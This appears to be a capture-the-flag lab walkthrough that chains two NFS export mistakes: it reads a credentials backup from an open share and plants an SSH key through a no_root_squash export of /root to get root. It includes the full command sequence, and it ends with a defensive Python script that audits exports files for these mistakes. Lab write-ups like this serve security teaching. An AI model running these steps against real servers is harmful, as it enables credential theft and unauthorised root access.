
Sharehouse

An NFS server quietly advertises its shares to anyone who asks — and one of them holds a credential backup. The other exports the root home directory with no_root_squash, trusting that no one outside the team has root on their machine. They were wrong.


Walkthrough, Tips and Tricks

Walkthrough

Objective

Exploit misconfigured NFS exports to recover credentials and escalate to root by planting an SSH authorized key via a no_root_squash share.

Attack Narrative

The ops team configured NFS for an internal backup agent and never revisited the export policy. Two shares are exposed: one contains a credential backup file, the other exports /root with no_root_squash — allowing any root-privileged NFS client to write root-owned files on the server. Chaining these two misconfigurations delivers a full compromise.

Prerequisites

  • NFS client tools (showmount, mount.nfs).
  • Root access on your attacker machine (required to mount as uid 0).
  • SSH key pair generation.

Phase 1: Service Discovery

  1. Scan the target — ports 22, 111, and 2049.
  2. Enumerate NFS exports:
     showmount -e TARGET

Expected output:

Export list for TARGET:
/root        *
/srv/nfsdata *

Phase 2: Mount the Public Share

mkdir /mnt/nfsdata
mount -t nfs TARGET:/srv/nfsdata /mnt/nfsdata
cat /mnt/nfsdata/credentials.bak

Credentials found:

ssh_user=labuser
ssh_pass=NfsBackup2024!

Unmount the share when done:

umount /mnt/nfsdata

Phase 3: Initial Access

ssh labuser@TARGET
cat ~/user.txt

Phase 4: Exploit no_root_squash

The /root export uses no_root_squash: files written by root on the NFS client are owned by root on the server.

On your attacker machine (as root):

# Generate an SSH key pair
ssh-keygen -t ed25519 -f /tmp/nfslab_key -N ""

# Mount the remote /root
mkdir /mnt/nfsroot
mount -t nfs TARGET:/root /mnt/nfsroot

# Plant the public key
mkdir -p /mnt/nfsroot/.ssh
cat /tmp/nfslab_key.pub >> /mnt/nfsroot/.ssh/authorized_keys
chmod 700 /mnt/nfsroot/.ssh
chmod 600 /mnt/nfsroot/.ssh/authorized_keys

umount /mnt/nfsroot

Phase 5: Root Shell

ssh -i /tmp/nfslab_key root@TARGET
cat /root/root.txt

Troubleshooting

  • showmount times out: ensure ports 111 and 2049 are reachable; try rpcinfo -p TARGET.
  • mount fails: install nfs-common (apt install nfs-common); check if you're running as root.
  • SSH key rejected: verify /root/.ssh/authorized_keys permissions (700/600); confirm root SSH login is permitted.

Verification Checklist

  • NFS exports enumerated with showmount.
  • /srv/nfsdata mounted and credentials.bak read.
  • SSH as labuser, user flag captured.
  • /root mounted via NFS as local root, authorized_keys planted.
  • SSH as root, root flag captured.

Tips and Tricks

  • showmount -e is the standard NFS recon command — run it as soon as you see port 2049.
  • no_root_squash means: root on the client = root on the server. Always check this option in exports.
  • If mount is slow, add -o vers=3 to force NFSv3.
  • Mounting writable shares: create files as root on your client; they will appear root-owned on the remote.
  • After planting the key, double-check authorized_keys permissions — SSH is strict about 0600.
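
A server-side check for the two export mistakes this lab chains, as an added example that is not part of the lab or its walkthrough: it parses exports(5) text and flags no_root_squash, any-host clients, and sensitive paths. The sample file, the SENSITIVE path list and the issue labels are assumptions made for illustration.

```python
# Constructed sample modelled on the two exports this lab describes; not the lab's real file.
SAMPLE_EXPORTS = """\
# shares for the backup agent
/srv/nfsdata  *(ro,sync,no_subtree_check)
/root         *(rw,sync,no_root_squash,no_subtree_check)
/srv/builds   -rw,sync 10.0.5.20(root_squash) \\
              10.0.5.21(ro)
"""

SENSITIVE = ("/root", "/etc", "/home")       # assumed policy: never export these trees
ANY_HOST = ("", "*", "0.0.0.0/0", "::/0")    # client specs that match every host

def last_wins(opts, on, off, default):
    """Resolve an on/off option pair; the last occurrence takes effect."""
    state = default
    for o in opts:
        if o in (on, off):
            state = (o == on)
    return state

def audit_exports(text):
    """Return sorted (path, client, issue) tuples for risky entries in exports(5) text."""
    findings = set()
    text = text.replace("\\\n", " ")                   # join continuation lines
    for line in text.splitlines():
        # Strip comments and tokenize; a blank line yields no client tokens.
        path, *clients = line.split("#", 1)[0].split() or [""]
        defaults = []
        for tok in clients:
            if tok.startswith("-"):                    # "-opt,opt" sets defaults for later clients
                defaults = tok[1:].split(",")
                continue
            client, _, own = tok.partition("(")
            opts = defaults + own.rstrip(")").split(",")
            shown = client or "*"                      # a bare "(opts)" token means every host
            if last_wins(opts, "no_root_squash", "root_squash", False):
                findings.add((path, shown, "no_root_squash"))
            if client in ANY_HOST:
                findings.add((path, shown, "any-host"))
                if last_wins(opts, "rw", "ro", False):
                    findings.add((path, shown, "any-host-rw"))
            if path == "/" or any(path == s or path.startswith(s + "/") for s in SENSITIVE):
                findings.add((path, shown, "sensitive-path"))
    return sorted(findings)

if __name__ == "__main__":
    print(*audit_exports(SAMPLE_EXPORTS), sep="\n")
```

Run it against the contents of /etc/exports on the server; an entry such as `host (rw)` with a stray space is reported as any-host-rw because the detached option list applies to every client.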

Useful Commands

showmount -e TARGET
rpcinfo -p TARGET
mount -t nfs -o vers=3 TARGET:/srv/nfsdata /mnt/nfsdata
mount -t nfs -o vers=3 TARGET:/root /mnt/nfsroot
ssh-keygen -t ed25519 -f /tmp/nfslab_key -N ""
